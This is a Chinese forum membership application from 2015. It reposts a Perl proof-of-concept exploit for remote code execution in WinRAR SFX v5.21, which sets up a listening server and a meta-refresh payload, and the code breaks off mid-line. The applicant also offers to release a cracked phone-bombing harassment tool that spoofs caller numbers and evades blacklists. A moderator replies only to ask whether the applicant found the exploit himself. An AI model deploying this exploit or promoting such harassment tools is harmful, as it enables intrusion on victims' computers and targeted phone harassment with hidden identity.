发表于 2015-10-7 13:47

申请ID:i安卓

申 请 I D :i安卓                     
个人邮箱:1669165062@qq.com


漏洞发现:WinRAR SFX v5.21 远程可执行代码附poc


测试代码
<html><head><title>poc</title><META http-equiv=”refresh” content=”0;URL=http://www.baidu.com”></head></html>


附上 POC
PoC: Exploit Code
#!/usr/bin/perl
# Title : WinRaR SFX – Remote Code Execution
# Tested on Windows 7 / Server 2008 / Server 2003
#
# lr3800.com
use strict;
use warnings;
use IO::Socket;
use MIME::Base64 qw( decode_base64 );
use Socket ‘inet_ntoa’;
use Sys::Hostname ‘hostname’;
print ” Mohammad Reza Espargham\n\n”;
my $ip = inet_ntoa(scalar gethostbyname(hostname() || ‘localhost’));
my $port = 80;
print “Winrar HTML Code\n”.'<html><head><title>poc</title><META http-equiv=”refresh” content=”0;URL=http://&apos; . $ip .
‘”></head></html>’.”\n\n” if($port==80);
print “Winrar HTML Code\n”.'<html><head><title>poc</title><META http-equiv=”refresh” content=”0;URL=http://&apos; . $ip .
‘:’ . $port . ‘”></head></html>’.”\n\n” if($port!=80);
my $server = new IO::Socket::INET( Proto => ‘tcp’,
LocalPort => $port,
Listen => SOMAXCONN,
ReuseAddr => 1)
or die “Unable to create server socket”;
# Server loop
while(my $client = $server->accept())
{
my $client_info;
while(<$client>)
{
last if /^\r\n$/;
$client_info .= $_;
}
incoming($client, $client_info);
}
sub incoming
{
print “\n=== Incoming Request:\n”;
my $client = shift;
print $c

————————————————————————————————————

咨询问题:我在某技术论坛有精华帖,和自己发布的原创工具和教程
我主要擅长一点编程,安卓破解......
这样能申请吗,如果符合申请条件,我会继续申请
如果能给个邀请码,我会在论坛发布一个收费版电话轰炸机破解版功能破黑名单,一直呼,响一声就挂,拨打号码自定义等牛逼的功能,自己破解无限制。
此电话轰炸机是手机版,轰炸更加方便,还有个牛逼的功能,轰炸手机号的人手机上显示手机号可以自定义,并不是未知号码,轰炸更加隐蔽
此电话轰炸机为自己私藏,百度搜不到。功能秒杀网上一切轰炸机。有人花300块向我买,我没卖
如果给个邀请码,我就当礼物发给大家,说到做到

Hmily 发表于 2015-10-10 18:50

你那么牛逼的轰炸机没兴趣,倒是我想问一下,这个rar的poc是你分析出来的?
页: [1]
查看完整版本: 申请ID:i安卓